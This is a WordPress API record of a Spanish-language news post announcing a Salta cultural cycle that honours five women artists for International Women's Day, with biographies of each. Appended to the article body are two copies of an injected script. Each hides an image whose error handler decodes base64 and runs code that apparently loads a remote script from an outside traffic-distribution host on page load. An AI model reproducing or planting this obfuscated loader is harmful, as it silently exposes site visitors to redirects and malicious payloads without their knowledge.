{"id":3817,"date":"2024-03-06T20:47:48","date_gmt":"2024-03-06T23:47:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3817"},"modified":"2025-08-13T23:59:10","modified_gmt":"2025-08-14T02:59:10","slug":"en-el-ciclo-cultural-raices-se-homenajeara-a-artistas-mujeres-en-el-8m","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3817","title":{"rendered":"En el ciclo cultural Ra\u00edces se homenajear\u00e1 a artistas mujeres en el 8M"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-81148deb1c7128a3482097c594938391\" style=\"background-color:#a22658\"><em>En el D\u00eda Internacional de la Mujer, L\u00eda Comitini, Cristina S\u00e1nchez, Liliana Rinaldi, Laura Serrano y Carmen Mill\u00e1n, dar\u00e1n inicio a la primera fecha del ciclo Ra\u00edces. La cita es este viernes 8 de marzo a las 20.30 en la Usina.<\/em><\/h4>\n\n\n\n<p>En conmemoraci\u00f3n del 8 de marzo, D\u00eda Internacional de la Mujer, la Secretar\u00eda de Cultura&nbsp;anunci\u00f3&nbsp;el inicio del ciclo \u00abRa\u00edces. Homenaje a la herencia art\u00edstica salte\u00f1a\u00bb. Este proyecto, que destaca la notable participaci\u00f3n de trabajadoras del arte locales con gran trayectoria, busca poner en valor la contribuci\u00f3n femenina al desarrollo cultural de la regi\u00f3n. El 8M recuerda la hist\u00f3rica huelga de mujeres trabajadoras textiles de la f\u00e1brica Triangle en la ciudad de Nueva York en 1908. Este d\u00eda, m\u00e1s de 140 j\u00f3venes trabajadoras, en su mayor\u00eda inmigrantes italianas y jud\u00edas, perdieron la vida de forma tr\u00e1gica en las instalaciones de la f\u00e1brica.<\/p>\n\n\n\n<p>Por este motivo, la iniciativa cultural rinde homenaje a las mujeres que, a trav\u00e9s de los a\u00f1os, han contribuido significativamente al enriquecimiento del patrimonio art\u00edstico de Salta con participaci\u00f3n y trabajo. Con una trayectoria vasta y un legado invaluable, L\u00eda Comitini; Cristina S\u00e1nchez; Liliana Rinaldi; Laura Serrano y Carmen Mill\u00e1n reciben un merecido reconocimiento, que no solo celebra su obra, sino tambi\u00e9n el impacto positivo que han tenido en su comunidad, trascendiendo incluso las fronteras de la provincia. La actividad cuenta con el acompa\u00f1amiento de la Secretar\u00eda de Mujeres, G\u00e9nero y Diversidad de la Provincia de Salta.<\/p>\n\n\n\n<p>El ciclo de homenajes Ra\u00edces, est\u00e1 organizado por la Secretar\u00eda de Cultura y tiene por objeto rendir tributo a aquellos talentos que han dedicado su vida al enriquecimiento cultural de la regi\u00f3n. Las entradas son libres y gratuitas estar\u00e1n disponibles en boleter\u00eda de la Casa de la Cultura, Caseros 460, de 9 a 13 h y de 17 a 21 h.<\/p>\n\n\n\n<p><em><strong>Las homenajeadas<\/strong><\/em><\/p>\n\n\n\n<p>L\u00eda Comitini es poeta, narradora, dramaturga y gestora cultural. Estudi\u00f3 m\u00fasica y danza. Profesora de Expresi\u00f3n Corporal en instituciones p\u00fablicas y privadas. Realiz\u00f3 proyectos culturales, sociales y educativos desde Organizaciones Sociales. Public\u00f3 una obra de teatro para ni\u00f1os y libros de poemas para ni\u00f1os y para adultos. Es miembro activo de LecturArte y Micr\u00f3sfera, un grupo literario en el que descifran, traducen e interpretan este basto lenguaje.<\/p>\n\n\n\n<p>Cristina S\u00e1nchez, es titiritera, actriz, gestora cultural, actualmente administra la sala de teatro Mitad del Pasillo. Desde sus inicios trabaj\u00f3 incansablemente para democratizar la labor teatral llevando sus t\u00edteres a toda la provincia y abriendo espacios como La Buhardilla. Estuvo al frente de la Asociaci\u00f3n Argentina de Actores en Salta y fue miembro de la Comisi\u00f3n Directiva que fund\u00f3 la Feria de la Balcarce.<\/p>\n\n\n\n<p>Liliana Rinaldi, maestra de danzas, directora, fundadora y creadora del prestigioso estudio que lleva su nombre, en el a\u00f1o 1967. Una mujer con iniciativa, creatividad y amor por la danza. \u2063<\/p>\n\n\n\n<p>Laura Serrano, cantante y docente, de destacada trayectoria en M\u00e9xico. En la provincia se consolida como una formadora de excelencia. Ha gradado junto a importantes figuras internacionales como Alejandro S\u00e1enz y Pancho C\u00e9spedes y ha participado en los festivales folkl\u00f3ricos m\u00e1s prestigiosos de Salta y el pa\u00eds.<\/p>\n\n\n\n<p>Carmen Mill\u00e1n es cafayate\u00f1a, Maestra Artesana en el rubro textil. Sus prendas formaron parte del desfile de Emprendedores de Nuestra Tierra, organizado por el Ministerio de Desarrollo Social de la Naci\u00f3n y Fundaci\u00f3n Exportar Argentina en Par\u00eds, Francia. Particip\u00f3 en destacadas ferias nacionales obteniendo importantes reconocimientos como el Premio a la Mejor Artesan\u00eda en el 40\u00ba Concurso Provincial a la Mejor Artesan\u00eda, Salta 2014 y Premio Categor\u00eda Proyecci\u00f3n, Rubro Fibras Animales del 200 Sal\u00f3n Nacional de Creatividad y Dise\u00f1o Artesanal de la Escuela Municipal de Artesan\u00eda, dependiente de la Secretar\u00eda de Cultura de la Municipalidad de Berazategui en 2017.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-el-ciclo-cultural-raices-se-homenajeara-a-artistas-mujeres-en-el-8m-94493\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el D\u00eda Internacional de la Mujer, L\u00eda Comitini, Cristina S\u00e1nchez, Liliana Rinaldi, Laura Serrano y Carmen Mill\u00e1n, dar\u00e1n inicio a la primera fecha del ciclo Ra\u00edces. La cita es este viernes 8 de marzo a las 20.30 en la Usina. En conmemoraci\u00f3n del 8 de marzo, D\u00eda Internacional de la Mujer, la Secretar\u00eda de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3818,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3817","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3817"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3817"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3817\/revisions"}],"predecessor-version":[{"id":6832,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3817\/revisions\/6832"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3818"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3817"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3817"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}